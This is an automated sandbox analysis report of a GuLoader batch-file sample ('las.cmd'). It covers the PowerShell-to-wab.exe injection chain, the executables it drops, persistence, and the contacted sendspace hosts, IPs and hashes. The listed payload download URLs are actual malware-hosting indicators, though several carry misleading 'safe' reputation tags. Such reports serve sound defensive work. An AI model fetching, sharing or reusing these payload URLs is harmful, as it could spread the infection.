              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446786 Sample: las.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 40 www.sendspace.com 2->40 42 fs13n4.sendspace.com 2->42 44 fs03n2.sendspace.com 2->44 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 Yara detected GuLoader 2->62 64 5 other signatures 2->64 9 cmd.exe 1 2->9         started        signatures3 process4 signatures5 66 Suspicious powershell command line found 9->66 68 Very long command line found 9->68 12 powershell.exe 14 23 9->12         started        16 conhost.exe 9->16         started        process6 dnsIp7 48 fs03n2.sendspace.com 69.31.136.17, 443, 49731 GTT-BACKBONEGTTDE United States 12->48 50 www.sendspace.com 172.67.170.105, 443, 49730, 49738 CLOUDFLARENETUS United States 12->50 78 Suspicious powershell command line found 12->78 80 Very long command line found 12->80 82 Found suspicious powershell code related to unpacking or dynamic code loading 12->82 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 52 Writes to foreign memory regions 18->52 54 Found suspicious powershell code related to unpacking or dynamic code loading 18->54 56 Hides threads from debuggers 18->56 25 wab.exe 17 18->25         started        30 cmd.exe 1 18->30         started        process11 dnsIp12 46 fs13n4.sendspace.com 69.31.136.57, 443, 49739 GTT-BACKBONEGTTDE United States 25->46 32 C:\Windows\svchost.com, PE32 25->32 dropped 34 C:\Users\user\AppData\Local\Temp\chrome.exe, PE32 25->34 dropped 36 C:\ProgramData\...\VC_redist.x64.exe, PE32 25->36 dropped 38 149 other malicious files 25->38 dropped 70 Creates an undocumented autostart registry key 25->70 72 Hides threads from debuggers 25->72 74 Drops executable to a common third party application directory 25->74 76 Infects executable files (exe, dll, sys, html) 25->76 file13 signatures14

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              las.cmd3%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/wlorhsXRwl0%Avira URL Cloudsafe
              http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
              http://crl.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://fs13n4.sendspace.com/0%Avira URL Cloudsafe
              https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/wlorhsP0%Avira URL Cloudsafe
              https://fs03n2.sendspaX0%Avira URL Cloudsafe
              https://www.sendspace.com0%Avira URL Cloudsafe
              https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx0%Avira URL Cloudsafe
              https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
              http://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
              http://www.sendspace.com0%Avira URL Cloudsafe
              http://fs03n2.sendspace.com0%Avira URL Cloudsafe
              http://www.autoitscript.com/autoit3/80%Avira URL Cloudsafe
              https://www.sendspace.com/0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/g1h76hMU0%Avira URL Cloudsafe
              https://aka.ms/pscore6lBfq0%Avira URL Cloudsafe
              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith0%Avira URL Cloudsafe
              https://fs03n2.sendspace.com0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/wlorhs0%Avira URL Cloudsafe
              https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxi0%Avira URL Cloudsafe
              https://www.autoitscript.com/site/autoit/80%Avira URL Cloudsafe
              https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff0%Avira URL Cloudsafe
              https://www.sendspace.com/pro/dl/g1h76h0%Avira URL Cloudsafe
              https://fs13n4.sendspace.com/ace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJ0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              fs03n2.sendspace.com
              		69.31.136.17
              		truefalse
                		unknown
                fs13n4.sendspace.com
                		69.31.136.57
                		truefalse
                  		unknown
                  www.sendspace.com
                  		172.67.170.105
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcxfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.binfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/wlorhsfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/g1h76hfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/JAutoIt3_x64.exe.8.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    https://www.sendspace.com/pro/dl/wlorhsXRwlpowershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://go.micropowershell.exe, 00000002.00000002.2059336952.000001E2B5DDF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://fs13n4.sendspace.com/wab.exe, 00000008.00000002.2375969322.00000000062EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946722033.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/wlorhsPpowershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorwab.exe, 00000008.00000002.2390087315.0000000021CF0000.00000004.00000010.00020000.00000000.sdmp, Uninstall.exe.8.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.autoitscript.com/autoit3/Au3Info_x64.exe.8.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs03n2.sendspaXpowershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.autoitscript.com/autoit3/AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sendspace.compowershell.exe, 00000002.00000002.2059336952.000001E2B68F6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.compowershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B6426000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://fs03n2.sendspace.compowershell.exe, 00000002.00000002.2059336952.000001E2B692E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithnotification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.micropowershell.exe, 00000005.00000002.1992900389.0000000007948000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://aka.ms/pscore6lBfqpowershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://fs03n2.sendspace.compowershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/g1h76hMUwab.exe, 00000008.00000002.2375969322.00000000062C2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.autoitscript.com/autoit3/8Au3Info_x64.exe.8.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://fs13n4.sendspace.com/ace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJwab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiwab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.autoitscript.com/site/autoit/8AutoIt3Help.exe.8.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffnotification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.drfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    69.31.136.17
                    		fs03n2.sendspace.comUnited States
                    		3257GTT-BACKBONEGTTDEfalse
                    172.67.170.105
                    		www.sendspace.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    69.31.136.57
                    		fs13n4.sendspace.comUnited States
                    		3257GTT-BACKBONEGTTDEfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1446786
                    Start date and time:2024-05-23 21:07:56 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 48s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:las.cmd
                    Detection:MAL
                    Classification:mal100.spre.troj.evad.winCMD@14/164@3/3
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 61%
                    • Number of executed functions: 31
                    • Number of non-executed functions: 28
                    Cookbook Comments:
                    • Found application associated with file extension: .cmd
                    • Stop behavior analysis, all processes terminated

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 7596 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7844 because it is empty
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: las.cmd

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    15:08:46API Interceptor327x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    69.31.136.17zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                      xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                        new.cmdGet hashmaliciousGuLoaderBrowse
                          las.cmdGet hashmaliciousGuLoaderBrowse
                            zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                              kam.cmdGet hashmaliciousGuLoaderBrowse
                                upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                  update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                    file.vbsGet hashmaliciousGuLoaderBrowse
                                      windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                        172.67.170.105zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                          new.cmdGet hashmaliciousGuLoaderBrowse
                                            las.cmdGet hashmaliciousGuLoaderBrowse
                                              kam.cmdGet hashmaliciousGuLoaderBrowse
                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                  las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                    windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                      file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                        time.vbsGet hashmaliciousGuLoaderBrowse
                                                          file300un.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                            69.31.136.57zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                              xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                new.cmdGet hashmaliciousGuLoaderBrowse
                                                                  xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                    las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                      las.cmdGet hashmaliciousGuLoaderBrowse
                                                                        kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                          windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                            file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                              update.vbsGet hashmaliciousGuLoaderBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                www.sendspace.comzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 172.67.170.105
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 104.21.28.80
                                                                                new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 104.21.28.80
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 172.67.170.105
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 104.21.28.80
                                                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 104.21.28.80
                                                                                fs03n2.sendspace.comupdate.vbsGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.17
                                                                                DOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                                                                                • 69.31.136.17
                                                                                JAN_YDHM007390.vbsGet hashmaliciousUnknownBrowse
                                                                                • 69.31.136.17
                                                                                fs13n4.sendspace.comlas.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 69.31.136.57
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.57
                                                                                time.vbsGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.57
                                                                                QA6433_#002.vbsGet hashmaliciousnjRatBrowse
                                                                                • 69.31.136.57

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 172.67.170.105
                                                                                https://u44668105.ct.sendgrid.net/ls/click?upn=u001.BTMESiTo6NsF48uIW4-2BrJkEc2YVFzyAaMWnWwgGT9cZqZS45ZZqu4Y-2FXJmZd8BXA8cja_AHV3UK6XjfrXMiZ9J4igW-2FDEUbICycoJ744IkX0PR6FoPBD5ixGfLkyQ9ofRFx1gjy-2BP-2BDUWqu7bhyffh6xflqZsbtNZtMLnpgQoCGrYBrKDAQCrs-2BXh7tVhTtmxcULJOM-2BKcO31hWTdcLyh6xHaFmrsv6JFsx6tjkxHhVyYzmDL2WjDZWPIbWyOCKFNxt29pnc1D6Wos9by2AU7AhdVB3KlHpWThOWm6-2FAP-2Buqng4Vq-2BmwndZ6wQGKVc-2FG51viAW-2FpPzuJOGK4hC-2FF-2FfgyonvDWvDkNa4J3BejflmN-2BuGCUZSHoW4H7oETlKRzn4f7VwMbU0WFOF9ZUfOI6CISxhvZQTsnMYzitMow1nPeu-2Flg0-2FzAaZA27HnZ5WdxtR2wKofgxyBDPpPjMUDCXBmEfEWtT8NXGmNaNpBvJDLI13EkOwRxoG67u0CqbvxxYYK-2F5eu2B-2Bg9JTJRxFbICA7lEJgDZLYhBS-2BbGjIrrRDvHg0hAvMhBJ54TVAoWNvYZYG-2FCqbCuzJrUBI0DoaRAGLq44smm73hnjeG06IT3WQV3A8KkhlXB3fqBFue-2Fd4ydFypfr1PkBzxIk-2FPd1H2pJdMYF-2B7HONDoFax8K-2BBkvfgdiIY-3DGet hashmaliciousUnknownBrowse
                                                                                • 104.17.3.184
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 104.21.28.80
                                                                                new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 104.21.28.80
                                                                                http://hxjmm.check-tl-ver-154-2.comGet hashmaliciousUnknownBrowse
                                                                                • 104.21.46.101
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 172.67.170.105
                                                                                GTT-BACKBONEGTTDEzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 69.31.136.57
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 69.31.136.57
                                                                                new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.57
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.17
                                                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.53
                                                                                zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 69.31.136.53
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 69.31.136.53
                                                                                las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 69.31.136.53
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.53
                                                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.57
                                                                                GTT-BACKBONEGTTDEzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 69.31.136.57
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 69.31.136.57
                                                                                new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.57
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.17
                                                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.53
                                                                                zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 69.31.136.53
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 69.31.136.53
                                                                                las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 69.31.136.53
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.53
                                                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 69.31.136.57

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0ezap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.17
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.17
                                                                                new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.17
                                                                                filePY.cmdGet hashmaliciousUnknownBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.17
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.17
                                                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.17
                                                                                zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.17
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.17
                                                                                las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.17
                                                                                S28BW-420120416270,pdf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.17
                                                                                37f463bf4616ecd445d4a1937da06e19zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.57
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.57
                                                                                new.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.57
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.57
                                                                                zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.57
                                                                                xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.57
                                                                                las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.57
                                                                                las.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.57
                                                                                V_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.57
                                                                                kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                • 172.67.170.105
                                                                                • 69.31.136.57

                                                                                Dropped Files

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                C:\Program Files (x86)\AutoIt3\Au3Info.exekam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                  1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exeGet hashmaliciousGuLoader, XWormBrowse
                                                                                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exekam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                      1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exeGet hashmaliciousGuLoader, XWormBrowse
                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exekam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                          1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exeGet hashmaliciousGuLoader, XWormBrowse
                                                                                            C:\Program Files (x86)\AutoIt3\Au3Check.exekam.cmdGet hashmaliciousGuLoaderBrowse
                                                                                              1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exeGet hashmaliciousGuLoader, XWormBrowse

                                                                                                Created / dropped Files

                                                                                                C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):275560
                                                                                                Entropy (8bit):6.100887295483481
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkkP5KVkD8QC2mCBFv9m7usyT8tKQ9clyPqlO91/iDVSsWUG0bCP0BwOvOIXM:/4VQjVsxyItKQNhigibKCM
                                                                                                MD5:AA874F4DC4061965993D91D3B5FC3639
                                                                                                SHA1:9A35E342D18389963F6F13555913597EB6CBC59C
                                                                                                SHA-256:07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
                                                                                                SHA-512:FBD1F63321327AB227C25E88F9CD47FF713D452E526A3CAF892A008034EAC5F2A1E95C4B21F54372AC95F679C2C82EA31EC5883B81ABF1190AD949F1B4615961
                                                                                                Malicious:true
                                                                                                Joe Sandbox View:
                                                                                                • Filename: kam.cmd, Detection: malicious, Browse
